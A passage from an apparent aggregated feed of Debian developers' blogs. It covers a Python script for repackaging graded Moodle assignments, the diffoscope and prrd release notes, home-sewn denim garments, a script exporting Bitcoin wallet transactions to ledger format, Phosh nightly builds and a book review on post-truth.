provides containing all their PDF files and comment them <a href="https://veronneau.org/grading-using-the-wacom-intuos-s.html">using xournalpp and
my Wacom tablet</a>.</p>
<p>Once this is done, I have a directory structure that looks like this:</p>
<pre>Assignment FooBar/
├── Student A_21100_assignsubmission_file
│ ├── graded paper.pdf
│ ├── Student A's perfectly named assignment.pdf
│ └── Student A's perfectly named assignment.xopp
├── Student B_21094_assignsubmission_file
│ ├── graded paper.pdf
│ ├── Student B's perfectly named assignment.pdf
│ └── Student B's perfectly named assignment.xopp
├── Student C_21093_assignsubmission_file
│ ├── graded paper.pdf
│ ├── Student C's perfectly named assignment.pdf
│ └── Student C's perfectly named assignment.xopp
⋮
</pre>
<p>Before I can upload files back to Moodle, this directory needs to be copied (I
have to keep the original files), cleaned of everything but the <code>graded
paper.pdf</code> files and compressed in a ZIP.</p>
<p>You can see how this can quickly get tedious to do by hand. Not being a
<em>complete</em> tool, I often resorted to crafting a few spurious shell one-liners
each time I had to do this<sup id="fnref:oneliner"><a class="footnote-ref" href="https://veronneau.org/feeds/languages/en.atom.xml#fn:oneliner">1</a></sup>. Eventually I got tired of <code>ctrl-R</code>-ing my
shell history and wrote something reusable.</p>
<p>Behold this script! When I began writing this post, I was certain I had cheaped
out on my 2021 New Year's resolution and written it in Shell, but glory!, it
seems I used a proper scripting language instead.</p>
<div class="highlight"><pre><span></span><code><span class="ch">#!/usr/bin/python3</span>
<span class="c1"># Copyright (C) 2023, Louis-Philippe Véronneau <pollo@debian.org></span>
<span class="c1">#</span>
<span class="c1"># This program is free software: you can redistribute it and/or modify</span>
<span class="c1"># it under the terms of the GNU General Public License as published by</span>
<span class="c1"># the Free Software Foundation, either version 3 of the License, or</span>
<span class="c1"># (at your option) any later version.</span>
<span class="c1">#</span>
<span class="c1"># This program is distributed in the hope that it will be useful,</span>
<span class="c1"># but WITHOUT ANY WARRANTY; without even the implied warranty of</span>
<span class="c1"># MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the</span>
<span class="c1"># GNU General Public License for more details.</span>
<span class="c1">#</span>
<span class="c1"># You should have received a copy of the GNU General Public License</span>
<span class="c1"># along with this program. If not, see <http://www.gnu.org/licenses/>.</span>
<span class="sd">"""</span>
<span class="sd">This script aims to take a directory containing PDF files exported via the</span>
<span class="sd">Moodle mass download function, remove everything but the final files to submit</span>
<span class="sd">back to the students and zip it back.</span>
<span class="sd">usage: ./moodle-zip.py <target_dir></span>
<span class="sd">"""</span>
<span class="kn">import</span> <span class="nn">os</span>
<span class="kn">import</span> <span class="nn">shutil</span>
<span class="kn">import</span> <span class="nn">sys</span>
<span class="kn">import</span> <span class="nn">tempfile</span>
<span class="kn">from</span> <span class="nn">fnmatch</span> <span class="kn">import</span> <span class="n">fnmatch</span>
<span class="k">def</span> <span class="nf">sanity</span><span class="p">(</span><span class="n">directory</span><span class="p">):</span>
<span class="w"> </span><span class="sd">"""Run sanity checks before doing anything else"""</span>
<span class="n">base_directory</span> <span class="o">=</span> <span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">basename</span><span class="p">(</span><span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">normpath</span><span class="p">(</span><span class="n">directory</span><span class="p">))</span>
<span class="k">if</span> <span class="ow">not</span> <span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">isdir</span><span class="p">(</span><span class="n">directory</span><span class="p">):</span>
<span class="n">sys</span><span class="o">.</span><span class="n">exit</span><span class="p">(</span><span class="sa">f</span><span class="s2">"Target directory </span><span class="si">{</span><span class="n">directory</span><span class="si">}</span><span class="s2"> is not a valid directory"</span><span class="p">)</span>
<span class="k">if</span> <span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">exists</span><span class="p">(</span><span class="sa">f</span><span class="s2">"/tmp/</span><span class="si">{</span><span class="n">base_directory</span><span class="si">}</span><span class="s2">.zip"</span><span class="p">):</span>
<span class="n">sys</span><span class="o">.</span><span class="n">exit</span><span class="p">(</span><span class="sa">f</span><span class="s2">"Final ZIP file path '/tmp/</span><span class="si">{</span><span class="n">base_directory</span><span class="si">}</span><span class="s2">.zip' already exists"</span><span class="p">)</span>
<span class="k">for</span> <span class="n">root</span><span class="p">,</span> <span class="n">dirnames</span><span class="p">,</span> <span class="n">_</span> <span class="ow">in</span> <span class="n">os</span><span class="o">.</span><span class="n">walk</span><span class="p">(</span><span class="n">directory</span><span class="p">):</span>
<span class="k">for</span> <span class="n">dirname</span> <span class="ow">in</span> <span class="n">dirnames</span><span class="p">:</span>
<span class="n">corrige_present</span> <span class="o">=</span> <span class="kc">False</span>
<span class="k">for</span> <span class="n">file</span> <span class="ow">in</span> <span class="n">os</span><span class="o">.</span><span class="n">listdir</span><span class="p">(</span><span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">root</span><span class="p">,</span> <span class="n">dirname</span><span class="p">)):</span>
<span class="k">if</span> <span class="n">fnmatch</span><span class="p">(</span><span class="n">file</span><span class="p">,</span> <span class="s1">'graded paper.pdf'</span><span class="p">):</span>
<span class="n">corrige_present</span> <span class="o">=</span> <span class="kc">True</span>
<span class="k">if</span> <span class="n">corrige_present</span> <span class="ow">is</span> <span class="kc">False</span><span class="p">:</span>
<span class="n">sys</span><span class="o">.</span><span class="n">exit</span><span class="p">(</span><span class="sa">f</span><span class="s2">"Directory </span><span class="si">{</span><span class="n">dirname</span><span class="si">}</span><span class="s2"> does not contain a 'graded paper.pdf' file"</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">clean</span><span class="p">(</span><span class="n">directory</span><span class="p">):</span>
<span class="w"> </span><span class="sd">"""Remove superfluous files, to keep only the graded PDF"""</span>
<span class="k">with</span> <span class="n">tempfile</span><span class="o">.</span><span class="n">TemporaryDirectory</span><span class="p">()</span> <span class="k">as</span> <span class="n">tmp_dir</span><span class="p">:</span>
<span class="n">shutil</span><span class="o">.</span><span class="n">copytree</span><span class="p">(</span><span class="n">directory</span><span class="p">,</span> <span class="n">tmp_dir</span><span class="p">,</span> <span class="n">dirs_exist_ok</span><span class="o">=</span><span class="kc">True</span><span class="p">)</span>
<span class="k">for</span> <span class="n">root</span><span class="p">,</span> <span class="n">_</span><span class="p">,</span> <span class="n">filenames</span> <span class="ow">in</span> <span class="n">os</span><span class="o">.</span><span class="n">walk</span><span class="p">(</span><span class="n">tmp_dir</span><span class="p">):</span>
<span class="k">for</span> <span class="n">file</span> <span class="ow">in</span> <span class="n">filenames</span><span class="p">:</span>
<span class="k">if</span> <span class="ow">not</span> <span class="n">fnmatch</span><span class="p">(</span><span class="n">file</span><span class="p">,</span> <span class="s1">'graded paper.pdf'</span><span class="p">):</span>
<span class="n">os</span><span class="o">.</span><span class="n">remove</span><span class="p">(</span><span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">root</span><span class="p">,</span> <span class="n">file</span><span class="p">))</span>
<span class="n">compress</span><span class="p">(</span><span class="n">tmp_dir</span><span class="p">,</span> <span class="n">directory</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">compress</span><span class="p">(</span><span class="n">directory</span><span class="p">,</span> <span class="n">target_dir</span><span class="p">):</span>
<span class="w"> </span><span class="sd">"""Compress directory into a ZIP file and save it to the target dir"""</span>
<span class="n">target_dir</span> <span class="o">=</span> <span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">basename</span><span class="p">(</span><span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">normpath</span><span class="p">(</span><span class="n">target_dir</span><span class="p">))</span>
<span class="n">shutil</span><span class="o">.</span><span class="n">make_archive</span><span class="p">(</span><span class="sa">f</span><span class="s2">"/tmp/</span><span class="si">{</span><span class="n">target_dir</span><span class="si">}</span><span class="s2">"</span><span class="p">,</span> <span class="s1">'zip'</span><span class="p">,</span> <span class="n">directory</span><span class="p">)</span>
<span class="nb">print</span><span class="p">(</span><span class="sa">f</span><span class="s2">"Final ZIP file has been saved to '/tmp/</span><span class="si">{</span><span class="n">target_dir</span><span class="si">}</span><span class="s2">.zip'"</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">main</span><span class="p">():</span>
<span class="w"> </span><span class="sd">"""Main function"""</span>
<span class="n">target_dir</span> <span class="o">=</span> <span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span>
<span class="n">sanity</span><span class="p">(</span><span class="n">target_dir</span><span class="p">)</span>
<span class="n">clean</span><span class="p">(</span><span class="n">target_dir</span><span class="p">)</span>
<span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s2">"__main__"</span><span class="p">:</span>
<span class="n">main</span><span class="p">()</span>
</code></pre></div>
<p>If for some reason you happen to have a similar workflow as I and end up using
this script, hit me up?</p>
<p>Now, back to grading...</p>
<div class="footnote">
<hr />
<ol>
<li id="fn:oneliner">
<p>If I recall correctly, the lazy way I used to do it involved
copying the directory, renaming the extension of the <code>graded paper.pdf</code>
files, deleting all <code>.pdf</code> and <code>.xopp</code> files using <code>find</code> and changing
<code>graded paper.foobar</code> back to a PDF. Some clever regex or learning <code>awk</code>
from the ground up could've probably done the job as well, but you know,
that would have required using my brain and <a href="https://debconf17.debconf.org/talks/92/">spending spoons</a>... <a class="footnote-backref" href="https://veronneau.org/feeds/languages/en.atom.xml#fnref:oneliner" title="Jump back to footnote 1 in the text">↩</a></p>
</li>
</ol>
</div>2024-03-08T23:15:36+00:00Louis-Philippe VéronneauReproducible Builds (diffoscope): diffoscope 260 released
https://diffoscope.org/news/diffoscope-260-released/
<p>The diffoscope maintainers are pleased to announce the release of diffoscope
version <code class="language-plaintext highlighter-rouge">260</code>. This version includes the following changes:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[ Chris Lamb ]
* Actually test 7z support in the test_7z set of tests, not the lz4
functionality. (Closes: reproducible-builds/diffoscope#359)
* In addition, correctly check for the 7z binary being available
(and not lz4) when testing 7z.
* Prevent a traceback when comparing a contentful .pyc file with an
empty one. (Re: Debian:#1064973)
</code></pre></div></div>
<p>You find out more by <a href="https://diffoscope.org">visiting the project homepage</a>.</p>2024-03-08T00:00:00+00:00Reproducible Builds (diffoscope)Valhalla's Things: Denim Waistcoat
https://blog.trueelena.org/blog/2024/03/08-denim_waistcoat/index.html
<article>
<section class="header">
Posted on March 8, 2024
<br />
Tags: <a href="https://blog.trueelena.org/tags/madeof%3Aatoms.html" title="All pages tagged 'madeof:atoms'.">madeof:atoms</a>, <a href="https://blog.trueelena.org/tags/craft%3Asewing.html" title="All pages tagged 'craft:sewing'.">craft:sewing</a>, <a href="https://blog.trueelena.org/tags/FreeSoftWear.html" title="All pages tagged 'FreeSoftWear'.">FreeSoftWear</a>
</section>
<section>
<p><img alt="A woman wearing a single breasted waistcoat with double darts at the waist, two pocket flaps at the waist and one on the left upper breast. It has four jeans buttons." class="align-center" src="https://blog.trueelena.org/blog/2024/03/08-denim_waistcoat/denim_waistcoat.jpg" style="width: 80.0%;" /></p>
<p>I had finished sewing my jeans, I had a scant 50 cm of elastic denim
left.</p>
<p>Unrelated to that, I had just finished drafting a vest with Valentina,
after <a href="https://sewing-patterns.trueelena.org/historical_womenswear/drafting_methods/cutters/index.html#vest">the Cutters’ Practical Guide to the Cutting of Ladies Garments</a>.</p>
<p>A new pattern requires a (wearable) mockup. 50 cm of leftover fabric
require a quick project. The decision didn’t take a lot of time.</p>
<p>As a mockup, I kept things easy: single layer with no lining, some edges
finished with a topstitched hem and some with bias tape, and plain tape
on the fronts, to give more support to the buttons and buttonholes.</p>
<p>I did add pockets: not real welt ones (too much effort on denim), but
simple slits covered by flaps.</p>
<p><img alt="a rectangle of pocketing fabric on the wrong side of a denim" class="align-center" src="https://blog.trueelena.org/blog/2024/03/08-denim_waistcoat/pocket_slit.jpg" style="width: 80.0%;" /></p>
<blockquote>
<p>piece; there is a slit in the middle that has been finished with
topstitching.</p>
</blockquote>
<p>To do them I marked the slits, then I cut two rectangles of pocketing
fabric that should have been as wide as the slit + 1.5 cm (width of the
pocket) + 3 cm (allowances) and twice the sum of as tall as I wanted the
pocket to be plus 1 cm (space above the slit) + 1.5 cm (allowances).</p>
<p>Then I put the rectangle on the right side of the denim, aligned so that
the top edge was 2.5 cm above the slit, sewed 2 mm from the slit, cut,
turned the pocketing to the wrong side, pressed and topstitched 2 mm
from the fold to finish the slit.</p>
<p><img alt="a piece of pocketing fabric folded in half and sewn on all 3" class="align-center" src="https://blog.trueelena.org/blog/2024/03/08-denim_waistcoat/pocket_first_seam.jpg" style="width: 80.0%;" /></p>
<blockquote>
<p>other sides; it does not lay flat on the right side of the fabric
because the finished slit (hidden in the picture) is pulling it.</p>
</blockquote>
<p>Then I turned the pocketing back to the right side, folded it in half,
sewed the side and top seams with a small allowance, pressed and turned
it again to the wrong side, where I sewed the seams again to make a
french seam.</p>
<p>And finally, a simple rectangular denim flap was topstitched to the
front, covering the slits.</p>
<p>I wasn’t as precise as I should have been and the pockets aren’t exactly
the right size, but they will do to see if I got the positions right (I
think that the breast one should be a cm or so lower, the waist ones are
fine), and of course they are tiny, but that’s to be expected from a
waistcoat.</p>
<p><img alt="The back of the waistcoat," class="align-center" src="https://blog.trueelena.org/blog/2024/03/08-denim_waistcoat/waistcoat_back.jpg" style="width: 80.0%;" /></p>
<p>The other thing that wasn’t exactly as expected is the back: the pattern
splits the bottom part of the back to give it “sufficient spring over
the hips”. The book is probably published in 1892, but I had already
found when drafting the foundation skirt that its idea of “hips”
includes a bit of structure. The “enough steel to carry a book or a cup
of tea” kind of structure. I should have expected <em>a lot</em> of spring, and
indeed that’s what I got.</p>
<p>To fit the bottom part of the back on the limited amount of fabric I had
to piece it, and I suspect that the flat felled seam in the center is
helping it sticking out; I don’t think it’s exactly <em>bad</em>, but it is
a <em>peculiar</em> look.</p>
<p>Also, I had to cut the back on the fold, rather than having a seam in
the middle and the grain on a different angle.</p>
<p>Anyway, my next waistcoat project is going to have a linen-cotton lining
and silk fashion fabric, and I’d say that the pattern is good enough
that I can do a few small fixes and cut it directly in the lining, using
it as a second mockup.</p>
<p>As for the wrinkles, there is quite a bit, but it looks something that
will be solved by a bit of lightweight boning in the side seams and in
the front; it will be seen in the second mockup and the finished
waistcoat.</p>
<p>As for this one, it’s definitely going to get some wear as is, in casual
contexts. Except. Well, it’s a denim waistcoat, right? With a very
different cut from the “get a denim jacket and rip out the sleeves”, but
still a denim waistcoat, right? The kind that you cover in patches,
right?</p>
<p><img alt="Outline of a sewing machine with teeth and crossed bones below it, and the text “home sewing is killing fashion / and it's illegal”" class="align-center" src="https://blog.trueelena.org/blog/2024/03/08-denim_waistcoat/Homesewing.svg" style="width: 80.0%;" /></p>
<p>And I may have screenprinted a “home sewing is killing fashion” patch
some time ago, using <a href="https://commons.wikimedia.org/wiki/File:Homesewing.svg">the SVG from wikimedia commons</a> / the <a href="https://en.wikipedia.org/wiki/Home_Taping_Is_Killing_Music">Home
Taping is Killing Music</a> page.</p>
<p>And. Maybe I’ll wait until I have finished the real waistcoat. But I
suspect that one, and other sewing / costuming patches may happen in the
future.</p>
<p>No regrets, as the words on my seam ripper pin say, right? :D</p>
</section>
</article>2024-03-08T00:00:00+00:00Elena “of Valhalla”Dirk Eddelbuettel: prrd 0.0.6 at CRAN: Several Improvements
http://dirk.eddelbuettel.com/blog/2024/03/07#prrd_0.0.6
<p>Thrilled to share that a new version of <a href="https://dirk.eddelbuettel.com/code/prrd.html">prrd</a> arrived at
<a href="https://cran.r-project.org">CRAN</a> yesterday in a first
update in two and a half years. <a href="https://dirk.eddelbuettel.com/code/prrd.html">prrd</a> facilitates
the <em>parallel running [of] reverse dependency [checks]</em> when
preparing R packages. It is used extensively for releases I make of <a href="https://www.rcpp.org">Rcpp</a>, <a href="https://dirk.eddelbuettel.com/code/rcpp.armadillo.html">RcppArmadillo</a>,
<a href="https://dirk.eddelbuettel.com/code/rcpp.eigen.html">RcppEigen</a>,
<a href="https://dirk.eddelbuettel.com/code/bh.html">BH</a>, and
others.</p>
<p><img alt="prrd screenshot image" src="https://github.com/eddelbuettel/prrd/raw/master/local/screenshot_prrd_rcpparmadillo.png" style="float: left; margin: 10px 10px 10px 0;" width="700" /></p>
<p>The key idea of <a href="https://dirk.eddelbuettel.com/code/prrd.html">prrd</a> is simple,
and described in some more detail on <a href="https://dirk.eddelbuettel.com/code/prrd.html">its webpage</a> and
its <a href="https://github.com/eddelbuettel/prrd">GitHub repo</a>.
Reverse dependency checks are an important part of package development
that is easily done in a (serial) loop. But these checks are also
generally <em>embarassingly parallel</em> as there is no or little
interdependency between them (besides maybe shared build depedencies).
See the (dated) screenshot (running six parallel workers, arranged in a
split <a href="https://byobu.org">byobu</a> session).</p>
<p>This release, the first since 2021, brings a number of enhancments.
In particular, the summary function is now improved in several ways. <a href="https://github.com/joshuaulrich/">Josh</a> also put in a nice PR
that generalizes some setup defaults and values.</p>
<p>The release is summarised in the NEWS entry:</p>
<blockquote>
<h4 id="changes-in-prrd-version-0.0.6-2024-03-06">Changes in prrd
version 0.0.6 (2024-03-06)</h4>
<ul>
<li><p>The summary function has received several enhancements:</p>
<ul>
<li><p>Extended summary is only running when failures are seen.</p></li>
<li><p>The <code>summariseQueue</code> function now displays an
anticipated completion time and remaining duration.</p></li>
<li><p>The use of optional package <span class="pkg">foghorn</span> has
been refined, and refactored, when running summaries.</p></li>
</ul></li>
<li><p>The <code>dequeueJobs.r</code> scripts can receive a date
argument, the date can be parse via <code>anydate</code> if <span class="pkg">anytime</span> ins present.</p></li>
<li><p>The <code>enqueeJobs.r</code> now considers skipped package when
running 'addfailed' while ensuring selecting packages are still on
CRAN.</p></li>
<li><p>The CI setup has been updated (twice),</p></li>
<li><p>Enqueing and dequing functions and scripts now support relative
directories, updated documentation (<a href="https://github.com/eddelbuettel/prrd/pull/18">#18</a> by Joshua
Ulrich).</p></li>
</ul>
</blockquote>
<p>Courtesy of my <a href="https://dirk.eddelbuettel.com/cranberries/">CRANberries</a>, there
is also a diffstat report for <a href="https://dirk.eddelbuettel.com/cranberries/2024/03/06#prrd_0.0.6">this
release</a>.</p>
<p>If you like this or other open-source work I do, you can <a href="https://github.com/sponsors/eddelbuettel">sponsor me at
GitHub</a>.</p>
<p style="font-size: 80%; font-style: italic;">
This post by <a href="https://dirk.eddelbuettel.com">Dirk
Eddelbuettel</a> originated on his <a href="https://dirk.eddelbuettel.com/blog/">Thinking inside the box</a>
blog. Please report excessive re-aggregation in third-party for-profit
settings.
</p><p></p>2024-03-07T23:05:00+00:00Dirk EddelbuettelPetter Reinholdtsen: Plain text accounting file from your bitcoin transactions
https://people.skolelinux.org/pere/blog/Plain_text_accounting_file_from_your_bitcoin_transactions.html
<p>A while back I wrote a small script to extract the Bitcoin
transactions in a wallet in the
ledger plain text accounting
format. The last few days I spent some time to get it working
better with more special cases. In case it can be useful for others,
here is a copy:</p>
<p></p><blockquote><pre>#!/usr/bin/python3
# -*- coding: utf-8 -*-
# Copyright (c) 2023-2024 Petter Reinholdtsen
from decimal import Decimal
import json
import subprocess
import time
import numpy
def format_float(num):
return numpy.format_float_positional(num, trim='-')
accounts = {
u'amount' : 'Assets:BTC:main',
}
addresses = {
'' : 'Assets:bankkonto',
'' : 'Assets:bankkonto',
}
def exec_json(cmd):
proc = subprocess.Popen(cmd,stdout=subprocess.PIPE)
j = json.loads(proc.communicate()[0], parse_float=Decimal)
return j
def list_txs():
# get all transactions for all accounts / addresses
c = 0
txs = []
txidfee = {}
limit=100000
cmd = ['bitcoin-cli', 'listtransactions', '*', str(limit)]
if True:
txs.extend(exec_json(cmd))
else:
# Useful for debugging
with open('transactions.json') as f:
txs.extend(json.load(f, parse_float=Decimal))
#print txs
for tx in sorted(txs, key=lambda a: a['time']):
# print tx['category']
if 'abandoned' in tx and tx['abandoned']:
continue
if 'confirmations' in tx and 0 >= tx['confirmations']:
continue
when = time.strftime('%Y-%m-%d %H:%M', time.localtime(tx['time']))
if 'message' in tx:
desc = tx['message']
elif 'comment' in tx:
desc = tx['comment']
elif 'label' in tx:
desc = tx['label']
else:
desc = 'n/a'
print("%s %s" % (when, desc))
if 'address' in tx:
print(" ; to bitcoin address %s" % tx['address'])
else:
print(" ; missing address in transaction, txid=%s" % tx['txid'])
print(f" ; amount={tx['amount']}")
if 'fee'in tx:
print(f" ; fee={tx['fee']}")
for f in accounts.keys():
if f in tx and Decimal(0) != tx[f]:
amount = tx[f]
print(" %-20s %s BTC" % (accounts[f], format_float(amount)))
if 'fee' in tx and Decimal(0) != tx['fee']:
# Make sure to list fee used in several transactions only once.
if 'fee' in tx and tx['txid'] in txidfee \
and tx['fee'] == txidfee[tx['txid']]:
True
else:
fee = tx['fee']
print(" %-20s %s BTC" % (accounts['amount'], format_float(fee)))
print(" %-20s %s BTC" % ('Expences:BTC-fee', format_float(-fee)))
txidfee[tx['txid']] = tx['fee']
if 'address' in tx and tx['address'] in addresses:
print(" %s" % addresses[tx['address']])
else:
if 'generate' == tx['category']:
print(" Income:BTC-mining")
else:
if amount < Decimal(0):
print(f" Assets:unknown:sent:update-script-addr-{tx['address']}")
else:
print(f" Assets:unknown:received:update-script-addr-{tx['address']}")
print()
c = c + 1
print("# Found %d transactions" % c)
if limit == c:
print(f"# Warning: Limit {limit} reached, consider increasing limit.")
def main():
list_txs()
main()
</pre></blockquote><p></p>
<p>It is more of a proof of concept, and I do not expect it to handle
all edge cases, but it worked for me, and perhaps you can find it
useful too.</p>
<p>To get a more interesting result, it is useful to map accounts sent
to or received from to accounting accounts, using the
<tt>addresses</tt> hash. As these will be very context dependent, I
leave out my list to allow each user to fill out their own list of
accounts. Out of the box, 'ledger reg BTC:main' should be able to
show the amount of BTCs present in the wallet at any given time in the
past. For other and more valuable analysis, a account plan need to be
set up in the <tt>addresses</tt> hash. Here is an example
transaction:</p>
<p></p><blockquote><pre>2024-03-07 17:00 Donated to good cause
Assets:BTC:main -0.1 BTC
Assets:BTC:main -0.00001 BTC
Expences:BTC-fee 0.00001 BTC
Expences:donations 0.1 BTC
</pre></blockquote><p></p>
<p>It need a running Bitcoin Core daemon running, as it connect to it
using <tt>bitcoin-cli listtransactions * 100000</tt> to extract the
transactions listed in the Wallet.</p>
<p>As usual, if you use Bitcoin and want to show your support of my
activities, please send Bitcoin donations to my address
<b><a>15oWEoG9dUPovwmUL9KWAnYRtNJEkP1u1b</a></b>.</p>2024-03-07T17:00:00+00:00Petter ReinholdtsenGuido Günther: Phosh Nightly Package Builds
https://phosh.mobi/posts/phosh-nightly/
Tightening the feedback loop Link to heading One thing we notice ever so often is that although Phosh’s source code is publicly available and upcoming changes are open for review the feedback loop between changes being made to the development branch and users noticing the change can still be quiet long.
This can be problematic as we ideally want to catch a regression or broken use case triggered by a change on the development branch (aka main) before the general availability of a new version.2024-03-07T14:19:30+00:00Guido GüntherGunnar Wolf: Constructed truths — truth and knowledge in a post-truth world
https://gwolf.org/2024/03/constructed-truths-truth-and-knowledge-in-a-post-truth-world.html
<blockquote>
This post is a review for <a href="https://www.computingreviews.com/">Computing Reviews</a>
for <em><a href="https://link.springer.com/book/10.1007/978-3-658-39942-9">Constructed truths — truth and knowledge in a post-truth world</a></em>
, a book
published in <em><a href="https://www.computingreviews.com/review/review_review.cfm?review_id=147722">Springer Link</a></em>
</blockquote>
<p>Many of us grew up used to having some news sources we could implicitly trust, such as well-positioned newspapers and radio or TV news programs. We knew they would only hire responsible journalists rather than risk diluting public trust and losing their brand’s value. However, with the advent of the Internet and social media, we are witnessing what has been termed the “post-truth” phenomenon. The undeniable freedom that horizontal communication has given us automatically brings with it the emergence of filter bubbles and echo chambers, and truth seems to become a group belief.</p>
<p>Contrary to my original expectations, the core topic of the book is not about how current-day media brings about post-truth mindsets. Instead it goes into a much deeper philosophical debate: What is truth? Does truth exist by itself, objectively, or is it a social construct? If activists with different political leanings debate a given subject, is it even possible for them to understand the same points for debate, or do they truly experience parallel realities?</p>
<p>The author wrote this book clearly prompted by the unprecedented events that took place in 2020, as the COVID-19 crisis forced humanity into isolation and online communication. Donald Trump is explicitly and repeatedly presented throughout the book as an example of an actor that took advantage of the distortions caused by post-truth.</p>
<p>The first chapter frames the narrative from the perspective of information flow over the last several decades, on how the emergence of horizontal, uncensored communication free of editorial oversight started empowering the “netizens” and created a temporary information flow utopia. But soon afterwards, “algorithmic gatekeepers” started appearing, creating a set of personalized distortions on reality; users started getting news aligned to what they already showed interest in. This led to an increase in polarization and the growth of narrative-framing-specific communities that served as echo chambers for disjoint views on reality. This led to the growth of conspiracy theories and, necessarily, to the science denial and pseudoscience that reached unimaginable peaks during the COVID-19 crisis. Finally, when readers decide based on completely subjective criteria whether a scientific theory such as global warming is true or propaganda, or question what most traditional news outlets present as facts, we face the phenomenon known as “fake news.” Fake news leads to “post-truth,” a state where it is impossible to distinguish between truth and falsehood, and serves only a rhetorical function, making rational discourse impossible.</p>
<p>Toward the end of the first chapter, the tone of writing quickly turns away from describing developments in the spread of news and facts over the last decades and quickly goes deep into philosophy, into the very thorny subject pursued by said discipline for millennia: How can “truth” be defined? Can different perspectives bring about different truth values for any given idea? Does truth depend on the observer, on their knowledge of facts, on their moral compass or in their honest opinions?</p>
<p>Zoglauer dives into epistemology, following various thinkers’ ideas on what can be understood as truth: constructivism (whether knowledge and truth values can be learnt by an individual building from their personal experience), objectivity (whether experiences, and thus truth, are universal, or whether they are naturally individual), and whether we can proclaim something to be true when it corresponds to reality. For the final chapter, he dives into the role information and knowledge play in assigning and understanding truth value, as well as the value of second-hand knowledge: Do we really “own” knowledge because we can look up facts online (even if we carefully check the sources)? Can I, without any medical training, diagnose a sickness and treatment by honestly and carefully looking up its symptoms in medical databases?</p>
<p>Wrapping up, while I very much enjoyed reading this book, I must confess it is completely different from what I expected. This book digs much more into the abstract than into information flow in modern society, or the impact on early 2020s politics as its editorial description suggests. At 160 pages, the book is not a heavy read, and Zoglauer’s writing style is easy to follow, even across the potentially very deep topics it presents. Its main readership is not necessarily computing practitioners or academics. However, for people trying to better understand epistemology through its expressions in the modern world, it will be a very worthy read.</p>2024-03-07T01:08:10+00:00Gunnar WolfValhalla's Things: Jeans, step two. And three. And four.
https://blog.trueelena.org/blog/2024/03/07-jeans_step_two_and_three_and_four/index.html
<article>
<section class="header">
Posted on March 7, 2024
<br />
Tags: <a href="https://blog.trueelena.org/tags/madeof%3Aatoms.html" title="All pages tagged 'madeof:atoms'.">madeof:atoms</a>, <a href="https://blog.trueelena.org/tags/FreeSoftWear.html" title="All pages tagged 'FreeSoftWear'.">FreeSoftWear</a>
</section>
<section>
<p><img alt="A woman wearing a regular pair of slim-cut black denim jeans." class="align-center" src="https://blog.trueelena.org/blog/2024/03/07-jeans_step_two_and_three_and_four/denim_jeans_front.jpg" style="width: 80.0%;" /></p>
<p>I was working on what looked like a good pattern for a pair of
jeans-shaped trousers, and I knew I wasn’t happy with 200-ish g/m²
cotton-linen for general use outside of deep summer, but I didn’t have a
source for proper denim either (I had been low-key looking for it for a
long time).</p>
<p>Then one day I looked at an article I had saved about fabric shops that
sell technical fabric and while window-shopping on one I found that they
had a decent selection of denim in a decent weight.</p>
<p>I decided it was a sign, and decided to buy the two heaviest denim they
had: a <a href="https://www.tessutoattivo.it/Jeany-12.5oz-Denim-Jeans-Tessuto-Nero">100% cotton, 355 g/m² one</a>
and a <a href="https://www.tessutoattivo.it/Selwyn-Denim-autentico-Elastico-Nero">97% cotton, 3% elastane at 385 g/m²</a>
<a class="footnote-ref" href="https://blog.trueelena.org#fn1" id="fnref1"><sup>1</sup></a>; the latter was a bit of compromise as I shouldn’t really be
buying fabric adulterated with the Scourge of Humanity, but it was
heavier than the plain one, and I may be having a thing for tightly
fitting jeans, so this may be one of the very few woven fabric where I’m
not morally opposed to its existence.</p>
<p>And, I’d like to add, I resisted buying any of the very nice wools they
also seem to carry, other than just a couple of samples.</p>
<p>Since the shop only sold in 1 meter increments, and I needed about 1.5
meters for each pair of jeans, I decided to buy 3 meters per type, and
have enough to make a total of four pair of jeans. A bit more than I
strictly needed, maybe, but I was completely out of wearable day-to-day
trousers.</p>
<p><img alt="a cardboard box with neatly folded black denim, covered in semi-transparent plastic." class="align-center" src="https://blog.trueelena.org/blog/2024/03/07-jeans_step_two_and_three_and_four/a_box_of_denim.jpg" style="width: 80.0%;" /></p>
<p>The shop sent everything very quickly, the courier took their time (oh,
well) but eventually delivered my fabric on a sunny enough day that I
could wash it and start as soon as possible on the first pair.</p>
<p>The pattern I did in linen was a bit too fitting, but I was afraid I had
widened it a bit too much, so I did the first pair in the 100% cotton
denim. Sewing them took me about a week of early mornings and late
afternoons, excluding the weekend, and my worries proved false: they
were mostly just fine.</p>
<p>The only bit that could have been a bit better is the waistband, which
is a tiny bit too wide on the back: it’s designed to be so for comfort,
but the next time I should pull the elastic a bit more, so that it stays
closer to the body.</p>
<p><img alt="The same from the back, showing the applied pockets with a sewn logo." class="align-center" src="https://blog.trueelena.org/blog/2024/03/07-jeans_step_two_and_three_and_four/denim_jeans_back.jpg" style="width: 80.0%;" /></p>
<p>I wore those jeans daily for the rest of the week, and confirmed that
they were indeed comfortable and the pattern was ok, so on the next
Monday I started to cut the elastic denim.</p>
<p>I decided to cut and sew two pairs, assembly-line style, using the
shaped waistband for one of them and the straight one for the other one.</p>
<p>I started working on them on a Monday, and on that week I had a couple
of days when I just couldn’t, plus I completely skipped sewing on the
weekend, but on Tuesday the next week one pair was ready and could be
worn, and the other one only needed small finishes.</p>
